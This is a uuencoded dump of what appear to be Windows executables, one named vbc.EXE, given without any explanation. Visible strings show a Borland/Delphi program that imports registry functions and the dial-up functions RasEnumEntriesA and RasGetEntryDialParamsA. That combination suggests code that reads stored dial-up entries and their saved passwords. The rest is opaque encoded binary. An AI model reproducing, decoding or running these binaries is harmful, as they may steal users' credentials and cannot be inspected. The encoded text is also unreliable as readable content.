M@R/^ZRZ+`ZD```"`="$E_/__?P/#B]B+5"0$B\/HYOG__X3`=`F+W0/?Z0W_ M__\SP.L9B\8KQP$%\%-``(M%`"4#``"`"_")=0"P`5E:75]>6\.058OL45-6 M5XORB]B`/?A30```=1/H+_3__X3`=0HSP(E%_.F1````,])5:#DD0`!D_S)D MB2*`/2U00```=`IH`%1``.A<[?__B]:+P^C?_?__A,!T!8E=_.LVB\;HH_K_ M_XOXB\.#Z`2+`"7\__]_@^@$._!]`HO&A?]T$8O7B\N1Z*H```"+P^C_^___ MB7W\,\!:65EDB1!H0"1``(`]+5!```!T"F@`5$``Z/SL___#Z9H#``#KY8M% M_%]>6UE=PXU``(7`=`K_%11`0``)P'4!P[`"Z0(```##D(/@?XL-!%!``(7) M=`-:_]%(BH"-)$``>0OHHA$``(N`!````.DG"```R\S(R=?/R,W.V]C*V=K< MW=[?X.'C`.3EPXO`4.AV$0``CX`$````PXU``%97B<:)UXG(.?=_$W0OP?D" M>"KSI8G!@^$#\Z1?7L.-=`[\C7P/_,'Y`G@1_?.EB<�.#Q@.#QP/SI/Q? M7L-7B<>(S8G(P>`09HG(B='!^0)X"?.KB=�/SJE_#D/\E#&%``(O`4S/; M:@#H[O___X/X!W4<:@'HXO___R4`_P``/0`-``!T!ST`!```=0*S`8O#6\.0 M58OL@\3T#[<%`$!``(E%^(U%_%!J`6H`:.@E0`!H`@``@.A)Z___A<!U33/` M56C!)4``9/\P9(D@QT7T!````(U%]%"-1?A0:@!J`&@$)D``BT7\4.@>Z___ M,\!:65EDB1!HR"5``(M%_%#H^.K__\/I$@(``.OO9J$`0$``9B7`_V:+5?AF M@^(_9@O"9J,`0$``B^5=PP!33T945T%215Q";W)L86YD7$1E;'!H:5Q25$P` M1E!536%S:U9A;'5E`````-OCF]DM`$!``,.+P(7`=`>+"+(!_U'\PX`]!$!` M``%V$&H`:@!J`&C?^NT.Z./I___#B\"`/01`0```=!904%)4:@)J`&CD^NT. MZ,7I__^#Q`A8PU1J`6H`:.#Z[0[HL>G__X/$!%C#@#T$0$```78'4%/IW/__ M_\.-0`"%R709BT$!@#GI=`R`.>MU#`^^P$%!ZP.#P04!P<.+P(`]!$!```%V M'%!24>C/____451J`6H`:.'Z[0[H5^G__UE96EC#B\"`/01`0``!=A%25&H! M:@!HXOKM#N@WZ?__6L.04%*`/01`0``!=@]4:@)J`&CC^NT.Z!KI__]:6,.M0`"+1"0$]T`$!@````^%K0```($XWOKM#HM0&(M(%'0P_.C;_O__BQ4(4$`` MA=(/A(L```#_TH7`#X2!````BU0D#.CN_O__B<*+1"0$BT@,@T@$`E,QVU97 M562+&U-04E&+5"0H:@!0:(8G0`!2Z++H__^+?"0HZ)4.``#_L`````")H``` M``"+;PB+7P3'1P2R)T``@\,%Z,S^____X^DA````Z&@.``"+B`````"+$8F0 M`````(M!".E._O__N`$```##BT0D!(M4)`CW0`0&````=!^+2@3'0@0(*$`` M4U9758MJ"(/!!>BN_O___]%=7UY;N`$```##B\"+1"0PQT`$6RA``.@$#@`` MBY``````BPJ)B`````"+0@R#8`3]@3C>^NT.=`V+0@CHV_W__^CB_?__,<"# MQ!1DBQ!9BQ*)$5U?7ENX`0```,.-0`#HNPT``(N0`````(L*B8@`````BT(( MZ*']__]:BV0D+#'`662)"%A=Z$?^____XL,QTHM,)`B+1"0$@\$%9(D"_]'" M#`##B\")%"3I``0``,.-0`!5B^R+50B+`CV2``#`?RQT7#V.``#`?Q5T5RT% M``#`=%PMAP```'0]2'1.ZV`%<?__/X/H`G(V=##K4CV6``#`?Q%T/2V3``#` M="Y(=!-(="3K.BW]``#`="^#Z#UT)NLLL,CK*K#)ZR:PS>LBL,_K'K#(ZQJP MU^L6L,[K$K#8ZPZPVNL*L-GK!K#*ZP*P_R7_````BU(,Z%C___]=P@0`BT0D M!/=`!`8```!U;/SHJ?S__XM4)`AJ`%!H?2E``%+HN^;__XM<)`2!.][Z[0Z+ M4Q2+0QAT'8L5"%!``(72#X0;____B=C_TH7`#X0/____BU,,Z$/]__^+#0!0 M0`"%R70"_]&+3"0$N-D```"+412)%"3IXP(``#'`PS'2C47T9(L*9(D"B0C' M0`18*4``B6@(B05P5$``PXO`,=*+!7!40`!DBPHYR'4(BP!DB0+#BPF#^?]T M"#D!=?6+`(D!PXU``%6+[%-65[]L5$``BT<(A<!T2(M?#(MP!#/256AB*D`` M9/\R9(DBA=M^$DN)7PR+1-X$A<!T`O_0A=M_[C/`6EE99(D0ZQ3IK?S__^BP M____Z)_]___H[OW__U]>6UW#D%6+[%-65Z%T5$``A<!T2XLP,]N+>`0STE5H MPBI``&3_,F2)(COS?A2+!-]#B1UX5$``A<!T`O_0._-_[#/`6EE99(D0ZQ3I M3?S__^A0____Z#_]___HCOW__U]>6UW#D(D%=%1``#'`B05X5$``B15\5$`` MBT($B04,4$``Z-;^___&!1!00```Z'+____#D%.+!1Q00`"[+$!``+D*```` M,=+W\8#",(@32X7`=?*+!2100`#HZ@$``(L5)%!``)(IT+LX0$``B<*#X@^* MDD1`0`"($TO!Z`1U[5O#C4``OVQ40`"+'8140`"++8!40`#_=QS_=R"+-[D+ M````\Z5?7C'`AP4<4$``]]@9P$#)P@P`PU-65U6[;%1``+X<4$``OR!00`"` M>R0`=1:#/P!T$8L7B=`STHD7B^C_U8,_`'7O@STD4$```'0^Z#____^`/2Q0 M0```=!:Z'$!``+@`4D``Z'<(``#H]0<``.L3:@!H/$!``&@<0$``:@#H8>3_ M_S/`HR100`"`>R0"=0J#/@!U!3/`B4,,Z`'^__^`>R0!=@6#/@!T'8M#$(7` M=!;H0@,``(M#$(M0"#M0!'0&4N@EY/__Z*S]__^`>R0!=0/_4RB`>R0`=`7H M`/___X,[`'4(BP90Z._C__^+`U:+\(O[N0L```#SI5[KC%!O<G1I;VYS($-O M<'ER:6=H="`H8RD@,3DX,RPY-R!";W)L86YD`%U?7EO#B\")!1Q00`#IW?[_ M_\./!2100`#IZ?___\.+$(72=!O'``````"+2OA)?`^)2OAU"E"-0OCH;/?_ M_UC#B\`QTF:+$/?"`$```'4:@_H(<A6!^@`!``!U$V;'````@\`(Z;7___]F MQP```,-0Z,'C___#4.C&____6,.#Q.1J'(U4)`124.B@X___@7PD$``0``!U M!HM$)`3K`C/`@\0<PXO`58OL@<3@_O__4U:)1?QH!0$``(V%X_[__U!J`.@? MX___QD7N`(U%^%!H/P`/`&H`:.0N0`!H`0``@.@YX___A<!U;3/`56CQ+4`` M9/\P9(D@QT7H!0```(U%Z%"-1>Y0:@!J`(V%X_[__U"+1?A0Z`SC__^%P'0: MC47H4(U%[E!J`&H`:`0O0`"+1?A0Z.[B__\SP%I9662)$&CX+4``BT7X4.C( MXO__P^GB^?__Z^^+1?Q0C87C_O__4.B@XO__:@6-1?-0:@/H@^+__U#H9>+_ M_S/V@+WC_O__``^$KP```(!]\P!U"H!][@`/A)\```"-A>/^__]0Z&KB__^+ MV(V%X_[__P/8ZP%+@#LN=`J-A>/^__\[V'7PC87C_O__.]AT;4.`?>X`=!RM1>Y04^@KXO__:@)J`(V%X_[__U#H$^+__XOPA?9U1H!]\P!T0(U%\U!3Z`7B M__]J`FH`C87C_O__4.CMX?__B_"%]G4@QD7U`(U%\U!3Z.'A__]J`FH`C87C M_O__4.C)X?__B_"+QEY;B^5=PP```%-O9G1W87)E7$)O<FQA;F1<1&5L<&AI M7$QO8V%L97,``````%6+[(/$^%-65XE%_*$,0$``B47X@WWX`'0Y,\!5:$,O M0`!D_S!DB2"+7?B+1?S_4P0SP%I9662)$.L*Z<SW___H%_G__XM%^(L`B47X M@WWX`'7'7UY;65E=PXO`BQ4(0$``B1"C"$!``,.+P%6+[%&)1?PSTE5HV"]` M`&3_,F2)(HM%_(M`!.AT____,\!:65EDB1!HWR]``(M%_#L%"$!``'4,BT7\ MBP"C"$!``.L?H0A`0`"%P'06BQ`[5?QU"8M5_(L2B1#K!HL`A<!UZL/I^_?_ M_^O"65W#B\`STHE0$(E0#%*-4!!2_W`(_W`4_S#H,N#__X7`=`,SP,/H;N#_ M_X/X;73SPS/`PU&+4`R%TGX:,\F)2`Q1C4PD!%%2_W`4_S#H'^#__X7`=`0S MP%G#Z#K@___K]_\PQT`$L-<``.BRW___2'4!P^@AX/__PU:+\#/`B48,B480 MBT8$+;'7``!T"TAT($AT+NE)`0``N````("Z`0```+D#````QT8<Y"]``.LG MN````$"Z`0```+D"````ZP^X````P+H!````N0,```#'1AP3,$``QT8D0#!` M`,=&(!`P0`"`?D@`#X2N````:@!H@````%%J`%)0C49(4.@DW___@_C_#X3K M````B0:!?@2SUP``#X6C````_TX$:@#_-N@0W___0`^$R0```"V!````<P(S MP&H`:@!0_S;H)-___T`/A*T```!J`(O4:@!2:(````"-EDP!``!2_S;HZ][_ M_UI(#X6+````,\`[PG-,@+P&3`$``!IT`T#K[VH":@`KPE#_-NC:WO__0'1G M_S;HR-[__TAU7>LBQT8D$#!``(%^!++7``!T!&KVZP)J]>B(WO__@_C_=#N) M!H%^!+'7``!T%_\VZ&'>__^%P'00@_@"=0?'1B`3,$``,\!>P_\VZ#;>___' M1@2PUP``N&D```#KZ<=&!+#7``#HE-[__^O;C8A,`0``B4@4,\F)",=`!+#7 M``#'0`B`````B4@,B4@0QT`86#!``(E('(E(((E()(U`2(72=!NU@HH*0H@( M0(3)=!&*"D*("$"$R70'_LUUZ$B(*,.+4`2!^K+7``!U"/]0'(7`=0[#@?JQ MUP``=/>X9P```.E'\O__BU`$@?JRUP``=0C_4""%P'4.PX'ZL=<``'3WN&<` M``#I(O+__XO`4XO8BU`$@>JQUP``=`Z#^@)W&?]0'(7`=0N+P_]3)(7`=0); MP^CV\?__Z_<]-%!``'3PN&<```#KZXO`4U:+\(O:BU8$@>JPUP``=`J#^@-W M&>BI____B\:)7@3_5AB%P'0%Z+CQ__]>6\.X9@```.BK\?__Z_&ZL=<``.N^ MNK+7``#KM[JSUP``Z[!65XOR@7@$LM<``'4NBW@4`W@,BU`(*U`,.]%_%@%0 M#"O*4%&+RO.D_U`<A<!U,UE8Z]H!2`SSI%]>PST`4D``=1114E#HJ/___UA: M68%X!++7``!TM[AI````Z#3Q___KUN@M\?__65CKS8O*NE1`0`"#^4!^(8/I M0%!1N4````#H>O___^B%`@``@[@$`````'4-65CKU87)#X]@____PUE8PS/) MB@I"Z5+___]3,]N*&BO+?@M04HO1Z*O___]:6(O+6T+I-?___[J40$``N0(` M``#H)O___^EN_O__@7@$LM<``'4>BT@,.T@(?0D#2!2($?]`#,-04O]0'(7` M=2=:6.OB/0!20`!U$E)0Z-[^__]86H%X!++7``!TR;AI````Z6OP___H9O#_ M_UI8PU*-4?_H,?___XO4N0$```#HNO[__UK#,\GK`%97B_!1B_J#R?^P`/*N M]]%)B_I:*]&+QE'H`?___UF+QHO77U[IBO[__XO`58OL,\!5:.`T0`!D_S!D MB2#_!?130`!U+;@T4$``Z-G]__^X`%)``.C/_?__Z-;C__^XW%-``.A0^/__ MN,Q30`#H1OC__S/`6EE99(D0:.<T0`##Z?/R___K^%W#C4``58OL,\!5:)DU M0`!D_S!DB2"#+?130``!#X.!````,\"C'%!``#/`HR100``SP*,H4$``Q@4N M4$```L8%+U!```+&!3!00``#9L<%S%-`````9L<%W%-```$`Z-7O__^$P'0% MZ/SO___HN_#__[@T4$``NJ0U0`#H?OS__[@`4D``NJ0U0`#H;_S__^CTVO__ MHQA00`#H6MO__Z,44$``,\!:65EDB1!HH#5``,/I.O+__^OX7<,```````#_ M)4!A0`"+P/\E/&%``(O`_R4X84``B\#_)31A0`"+P/\E,&%``(O`58OL4[@( M````A<!T0X,]G%1```!]"KCB````Z,3V__]H"````&I`Z+S___^+V(7;=0RX MX@```.BH]O__ZPQ3H9Q40`!0Z*[___^)':Q40`!;7<.0B@V85$``BP6<5$`` MA,EU*&2+%2P```"+!(+#Z(S___^+!9Q40`!0Z'#___^%P'0!PXL%K%1``,-0 MZ%[___^%P'39PY!5B^R!Q/C^__]3:`4!``"-A?O^__]0H:140`!0Z!____^MA?O^___HM/;__XO8B1V@0$``A=MU"J&<0$``HZ!`0`"XF$!``.BP^/__6XOE M7<.-0`!0:@#H[/[__[J80$``4HD%I%1``(E"!.B0____6ECH_?/__\-5B^PS MP%5H!3=``&3_,&2)(/\%J%1``#/`6EE99(D0:`PW0`##Z<[P___K^%W#B\"# M+:A40``!PU6+[#/`56@]-T``9/\P9(D@_P6P5$``,\!:65EDB1!H1#=``,/I MEO#__^OX7<.+P(,ML%1```'#_R5,84``B\#_)4AA0`"+P%6+[#/`56B%-T`` M9/\P9(D@_P6T5$``,\!:65EDB1!HC#=``,/I3O#__^OX7<.+P(,MM%1```'# M4X'$X/O__XO8C40D!#/)NAP$``#H1^W__\=$)`0<!```C50D"(O#N0$!``#H M[^S__\<$)/____]4C40D"%!J`.A[____A<`/A94```"#/"0`=0C&A"0,`P`` M`+J$.$``N`!20`#HMOO__XU4)`CH4?S__[J(.$``Z*/[__^-E"0+`@``Z#O\ M__^ZD#A``.B-^___Z#'Z__^#/"0`=1:ZF#A``+@`4D``Z'/[___H%_K__^LD MLB*X`%)``.B;^___C90D#`,``.CX^___LB+HB/O__^CQ^?__N`!20`#H9?O_ M_X'$(`0``%O#```#0SH@!3H@3#HB```$(B!0.@````9U;FMN;W<`4U:!Q`3P M__]0@<0(\?__C40D"#/)NO`>``#H.>S__\=$)`@(`0``QP0D\!X``#/`B40D M!(U$)`10C40D!%"-1"004&H`:@#H9/[__X7`=1^+="0$A?9^%XU<)`B+PX/` M!.B2_O__@<,(`0``3G7M@<3X'@``7EO#58OL,\!5:#<Y0`!D_S!DB2`SP%I9 M662)$&@^.4``P^F<[O__Z_A=PP4```!(.4``$#=``.`V0`#L-$``C#1``$@W M0``8-T``D#=``&`W0```````&#E``%6+[(/$],8%+%!```&X0#E``.@U_?__ MZ!3____H__'__XU````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````````````````````````````````#(3B\``C4`````````` M``",'D``%"!``(@C0`!2=6YT:6UE(&5R<F]R("`@("!A="`P,#`P,#`P,`"+ MP$5R<F]R`(O`,#$R,S0U-C<X.4%"0T1%1B`@("`@("`@("`@("`@("`@("`@ M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`M"HO````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M````````````````````5&$``(Q@``````````````````!B8P``#&$````` M`````````````(YC```880``````````````````SF,``"AA```````````` M``````#L8P``,&$``````````````````$YD``!(80`````````````````` M``````````!B80``>F$``))A``"J80``QF$``-1A``#D80``\&$``/YA```. M8@``&F(``"9B```X8@``2F(``%QB``!R8@``A&(``)1B``"F8@``M&(``,)B M``#.8@``X&(``/!B``#\8@``"&,``!IC```J8P``.&,``$9C``!48P`````` M`&YC``"`8P```````)QC``"P8P``P&,```````#<8P```````/IC```(9``` M%F0``"1D```X9````````%QD``!V9````````&ME<FYE;#,R+F1L;`````!$ M96QE=&5#<FET:6-A;%-E8W1I;VX```!,96%V94-R:71I8V%L4V5C=&EO;@`` M``!%;G1E<D-R:71I8V%L4V5C=&EO;@````!);FET:6%L:7IE0W)I=&EC86Q3 M96-T:6]N````5FER='5A;$9R964```!6:7)T=6%L06QL;V,`````3&]C86Q& M<F5E````3&]C86Q!;&QO8P````!6:7)T=6%L475E<GD`````;'-T<FQE;D$` M````;'-T<F-P>4$`````3&]A9$QI8G)A<GE%>$$`````1V5T5&AR96%D3&]C M86QE````1V5T4W1A<G1U<$EN9F]!````1V5T36]D=6QE1FEL94YA;65!```` M`$=E=$QO8V%L94EN9F]!`````$=E=$QA<W1%<G)O<@````!'971#;VUM86YD M3&EN94$```!&<F5E3&EB<F%R>0```$5X:710<F]C97-S````5W)I=&5&:6QE M````4V5T1FEL95!O:6YT97(`````4V5T16YD3V9&:6QE`````%)T;%5N=VEN M9````%)E861&:6QE`````%)A:7-E17AC97!T:6]N`````$=E=%-T9$AA;F1L M90````!'971&:6QE4VEZ90```$=E=$9I;&54>7!E````0W)E871E1FEL94$` M``!#;&]S94AA;F1L90!U<V5R,S(N9&QL`````$=E=$ME>6)O87)D5'EP90`` M`$UE<W-A9V5";WA!`&%D=F%P:3,R+F1L;`````!296=1=65R>59A;'5E17A! M`````%)E9T]P96Y+97E%>$$```!296=#;&]S94ME>0!O;&5A=70S,BYD;&P` M````5F%R:6%N=$-L96%R``!K97)N96PS,BYD;&P`````5&QS4V5T5F%L=64` M``!4;'-'971686QU90```$QO8V%L06QL;V,`````1V5T36]D=6QE2&%N9&QE M00````!'971-;V1U;&5&:6QE3F%M94$``')A<V%P:3,R+F1L;`````!287-' M971%;G1R>41I86Q087)A;7-!`````%)A<T5N=6U%;G1R:65S00`````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````'!```AP0`"<5$``$(!````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M````````````````````````````````````$```-`$```(P"C`2,!HP(C`J M,#(P.C!",$HP4C!:,&(P:C!R,'HP@C"*,)(PFC"B,*HPLC"Z,,(PRC#2,-HP M!C$.,18Q'C$F,2XQ-C$^,4<Q:#%P,=@QWS$G,YXS[3,S-$8TO#0`-4$U=36! M-9PU+S9^-[HWUS?B-^TW]3?_-PDX$S@I."\X/3A0.%HX8#AN.'0X?#B..)HX MJ3BU.+TXR#C..-LXX3C[.`(Y##D6.2`Y+#DW.4HY4#E8.6(Y>SF&.:`YL3G. M.>8Y[CDN.D0ZDSJS.M$ZW#OI.QP\(CPZ/$,\3#Q7/&`\9SQV/'T\GSSX/``] M?CV?/:0]JCT6/AP^+#XU/GH^@SZ9/K<^PS[+/OX^*#]"/VP_=3^%/XT_DS^< M/Z,_J#^N/\$_RC_H/^X_]C\````@``#X````(#`F,#@P4#!<,&0P>S"*,)HP MNC#2,/8P_C`$,0HQ/#%@,7XQCC&4,9PQ]C$!,@HR$#(@,BDR>C*!,I$RFS*A M,JDRKS*U,KPRQC)M,Y4SLS._,\<S(30G-"\T4C1I-'<T&C59-6DU?S6=-;,U MRC7?-1DV+C9*-GXVLC;:[email protected]=\-Z0W[S<7.',YD3FS.>0Y[3GX.2,Z.#J# M.I8ZJCK>.N8Z[#KU.@`[#SL4.RT[.#M`.TL[73MC.VD[@CN5.YH[GSO!.\\[ MUSO<.^\[]#L"/*H\MCQY/8\]S3WC/14_)C]F/VT_?S^=/Z8_LC^Y/P```#`` M`,````"*,+,PNC#!,(`QNS$*,K4R4#.",^`S&S23-)\TIC2P-+\TR33;-/,T M_S0--10U&S4A-2@U+S4W-4`U6C5?-6DU;C5]-8<UE#6J-;(UNC7"-<HUWS40 M-APV)C8L-D8V5S9_-I@VH3:F-JLVQ3;,-N<V\S8`-Q(W'S<K-S@W2C=2-UHW M9S=S-X`WDC?T-_DW##@B.#<X/#A/.'$X'SDR.40Y2#E,.5`Y5#E8.5PY8#ED M.6PY>#E^.0```$```!`````0,!0P&#````"````4`````#`$,`@P##`````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` @```````````````````````````````````````````` ` end sum -r/size 49214/15872 begin 644 vbc.EXE M35K@`!H`G`!`````___F`H``````````/@````$`^U!J<@`````````````` M```````````````````````!````6P```*`````Z`0``XP&"`M8!@@+(`8(" M=P&"`C8!@@(/`8("Z`""`L,`@@*J`(("BP""`F\`@@)*`(("%0""`EP"``"0 M`@``MP(``)4#``"``P``:@,``%0#```/`P``!0,``/("``#D`@``V`(``!X! MI`(:`:0"%@&D`EL$```M!```<P0``(L$``"H!```+`4``%,%``!=!0``\`4` M`(D%``!L!@``=@8``*4&``"S!@``Q@8``.4&``#S!@``_P8``!0'```D!P`` M/@<``$X'``!C!P``<P<``(T'``"C!P``P@<``/\'``"M#```S!(``+,2``": M$@``?1(``%82``!&$@``01(```H2``#Q$0``[!$``-`1``#%$0``HA$``(81 M``!\$0``7A$``$<1```^$0``_!(``%T4``"`%```Q10``*P4``"D%```WQ0` M`.\4```-%0``$A4``"L5``"4%0``1A8``#$7```E%P``'A<``&T9```T&0`` M&QD``!09```^&```&!@```\8``#W%P``;!<``*89``#<&@``4QH``,T9```\ M&P``?QL``/X;```>'```#QT``$8;```4'0``*AT``$\=``!Q'0``CQT``*`= M``#+'0``Z1T```0?```>'P``6Q\``)(B``#>(0``72$``#\A```Z(0``J2`` M`)L?``!W'P``;R,``'0C``":(P``SR,``#XD```=)0``%"4``%LD``"$)0`` MQR4``&PF``!%)@``(B8``/HE``#R)0``6B<``&0G``"/)P``VR<``+8G``"M M)P``_R<``/4G```````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````````````````````````````````````+JD`BZ)%E,"M##M(8LN`@"+'BP`CMJC?0",!GL`B1YW`(DNCP#H0`'$/G4`B\>+V+G_?_SRKN-# M0R8X!77V@,V`]]F)#G4`N0(`T^.#PQ"#X_")'GD`C-(KZK^D`H[')HL^4`.! M_P`"<PB_``(FB3Y0`[$$T^]'.^]S`^F^`8O?`]J)'H<`B1Z+`*%[`"O8CL"T M2E?-(5_3Y_J.THOG^[BD`H[`)HD^4`.#/K`"%'9'@#Y]``-R0'<'@#Y^`!YR M-[@!6+L"`,TA<BJT9XL>L`+-(7(@M$B[`0#-(7(70*./`$B.P+1)S2%R"K@! M6+L``,TA<P/I10&T`,T:B1:!`(D.@P`*P'0,N$``CL"[<``FQ@<!,^TNC@93 M`KX.!+\:!.BZ`/\V<P#_-G$`_S9O`/\V;0#_-FL`F@T`@@)0D`[H#0(NC@93 M`E97OAH$OQH$Z(L`7U[+RXOLM$R*1@3-(;D.`+HO`.G:`!ZX`#7-(8D>6P", M!ET`N`0US2&)'E\`C`9A`+@%-<TAB1YC`(P&90"X!C7-(8D>9P",!FD`N``E MC,J.VKI?`<TA'\,>+HX>4P(>N``EQ19;`,TA'QZX!"7%%E\`S2$?'K@%)<46 M8P#-(1^X!B7%%F<`S2$?RX'^#@1T!#+DZP*T_XO7B]X[WW0C)H`__W08@?X. M!'0&)CIG`>L$)CAG`7<&)HIG`8O3@\,&Z]D[UW0;B]HF@#\`)L8'_P9T!R;_ M7P('Z[$F_U<"!^NJP[1`NP(`S2'#N1X`NCT`+HX>4P+HZO^X`P!0D`[H$@$` M``7`58OL'KBD`H[8@SZ2`"!U!;@!`.L<BQZ2`-'CT>.+1@B+5@:)AY8`B9>4 M`/\&D@`SP!]=RU6+[!ZXI`*.V!ZT0S+`Q58&S2$?<@K$7@HFB0\SP.L$4.B^ M`1]=RU6+[!ZXI`*.V!ZT0[`!Q58&BTX*S2$?<@0SP.L$4.B:`1]=RQZXI`*. MV!_+58OL5AZXI`*.V(MV"`OV=37K';BD`H[`)O\.D@`FBQZ2`-'CT>.XI`*. MP";_GY0`N*0"CL`F@SZ2``!UUI`.Z"+^_QX4`9`.Z(+^D`[H)_Z#?@8`=14+ M]G4(_QX8`?\>'`'_=@20#N@._ED?7EW"!@!5B^P>N*0"CM@SP%!0_W8&Z'S_ M'UW+58OL'KBD`H[8N`$`4#/`4/]V!NAC_Q]=RQZXI`*.V#/`4+@!`%`SP%#H M3?\?RQZXI`*.V+@!`%!0,\!0Z#K_'\M;#E.`^1!S$(O8T^#3XO;9@,$0T^L+ MT\N`Z1"2,\#3XLL'#@8+R7T,]]/WT8/#`8/1`.LO`\-S!('"`!"*Z;$$TN4" M]8KHT^@#T(K%)0\`RP<.!@O)?0SWT_?1@\,!@]$`Z]$KPW,$@>H`$(KYL032 MYS+;*].*Z-/H`]"*Q24/`,M5B^Q6'KBD`H[8BW8$"_9\%8/^6'X#OE<`B3;> M`HJ$X`*8B_#K#??>@_XC?^G'!MX"__^XI`*.P":)-G\`N/__'UY=P@(`58OL M5AZXI`*.V(MV!%;HJ?^+QA]>7<("`%6+[!ZXI`*.V+@`1(M>!LTADB6``!]= MRU6+[(/L(E97'KBD`H[8!L1^"HM>"(/[)'=<@/L"<E>+1@Z+3A`+R7T2@'X& M`'0,)L8%+4?WV??8@]D`C7;>XQ"1*]+W\Y'W\S:(%$;C"NOP*]+W\S:(%$8+ MP'7TC4[>]]D#SOQ.-HH$+`IS!`0ZZP,"1@2JXNZP`*H'BU8,BT8*'U]>B^5= MP@X`58OL'KBD`H[8,\!0_W8(_W8&_W8$N`H`4+``4+!A4.A5_Q]=P@8`58OL M'KBD`H[8BUX&T>.XI`*.P":!I[("__VT0HI&#(M>!HM."HM6",TA<@+K!5#H MI_Z9'UW+58OL'KBD`H[8BT8*"T8,=0B,7@S'1@HZ`_]V!(M&!@M&"'4'C-JX M1P/K!HM6"(M&!E)0_W8,_W8*D`[HY0:#Q`A24.A=_QZX2P-0_W8,_W8*D`[H MHQ^#Q`B+5@R+1@H?7<(*`%6+[(/L`AZXI`*.V/]V"O]V"#/`4%#$7@0F@S__ M=06X`@#K`[@!`,1>!"8!!R:+!U#H:/^)5@J)1@@6C4;^4/]V"O]V")`.Z%G\ M@\0("\!TNXM6"HM&"!^+Y5W""`!1BNBQ!-/H`]"*Q8KCT^M9`\N*W"4/`(/C M#SO1=0([P\-5B^P>N*0"CMB+7@;1X[BD`H[`)O>'L@("`'0&N`4`4.L4'K0_ MBUX&BTX,Q58(S2$?<@+K!%#HA_T?7<L>N*0"CMBY!0#K1(O9T>.XI`*.P";' MA[("``"+P;H4`/?JNJ0"B]B.PB;&AR0!_XO!NA0`]^H%(`%0B\&Z%`#WZKJD M`HO8CL)8)HF',@%!N*0"CL`F.0ZP`G>PN*0"CL`FH"0!F%"0#NAX_5D+P'4, MN*0"CL`F@28B`?_]N``"4+BD`H[`)O<&(@$``G0%N`$`ZP(SP%`SP%!0N*0" M4+@@`5"0#N@*'8/$#+BD`H[`)J`X`9A0D`[H*?U9"\!U#+BD`H[`)H$F-@'_ M_;@``E"XI`*.P";W!C8!``)T!;@"`.L",\!0,\!04+BD`E"X-`%0D`[HNQR# MQ`P?PU6+[!ZXI`*.V+@!`%`SP%!0_W8&D`[HE_V#Q`@?7<M5B^P>N*0"CM@> MM$'%5@;-(1]R!#/`ZP10Z$[\'UW+BL;H`@"*PM00AN#H`@"&X`20)Q1`)ZK# M58OL@>R6`%97'KBD`H[8QT;N``#'1NQ0`,=&Z@``ZTI7N?__,L#RKO?125_# M-H@%1_Y.['4S4U%2!HV&:O\K^!:-AFK_4%?_=@S_=@K_5@X+P'4%QT;J`0#' M1NQ0``%^[HV^:O\'6EE;PP;\C;YJ_XE^_(M^_,1V!B:L"L!T$CPE=!$VB`5' M_D[L?^WHI__KZ.G.`XEV\":L/"5TYHE^_#/)B4[RQT;^(`"(3O7'1OC__\=& M]O__ZP(FK#+DB]"+V(#K((#[8',3BI]9`X/[%W8#Z7D#T>,N_Z=W#.EO`X#] M`'?X@T[^`>O/@/T`=^V#3OX"Z\2`_0!WXH!^]2MT`XA6]>NT@V;^W^L$@T[^ M(+4%ZZ:`_0!W3?=&_@(`=2F#3OX(M0'KDNDD`XM^!#:+!8-&!`*`_0)S$@O` M>0;WV(-._@*)1OBU`^EN_X#]!'77B4;V_L7I8?^`_01SRK4$_T;VZ53_DBPP MF(#]`G<9M0*'1O@+P'S1T>"+T-'@T>`#P@%&^.DR_X#]!'6;AT;V"\!TM='@ MB]#1X-'@`\(!1O;I%O^#3OX0Z67_@4[^``	O[OZ5G_MPCK"K<*ZPJW$+/I M`MK&1O4`B%;[,]*(5OJ+?@0VBP7K$+<*QD;Z`8A6^XM^!#:+!9E'1XEV!O=& M_A``=`4VBQ5'1XE^!(U^NPO`=0T+TG4)@W[V`'4'Z6/^@T[^!%)0%E>*QYA0 MBD;Z4%/HAOH6!XM6]@O2?0/IZ@#I]0"(5ON)=@:-?KJ+7@0V_S=#0XE>!/=& M_B``=!`VBQ=#0XE>!!8'Z(W]L#JJ%@=:Z(3]-L8%`,9&^@"#9O[[C4ZZ*_F' MSXM6]CO1?P*+T>F7`(EV!HA6^XM^!#:+!8-&!`(6!XU^NS+D-HD%N0$`Z;H` MB78&B%;[BWX$]T;^(`!U`^EQ_C;$/8-&!`2,P`O'=04>![]2`^A5_3M.]G8# MBT[VZ8<`B78&B%;[BWX$BT[V"\E]`[D&`!9741:-7KM34K@!`"-&_E"+1OZI M``%T";@(`(-&!`KK!X-&!`BX!@!0Z!X(%@>-?KOW1OX(`'08BU;X"])^$>CU M_":`/2UU`4DKT7X#B5;R)H`]+70+BD;U"L!T%$\FB`6#?O(`?@J+3O8+R7T# 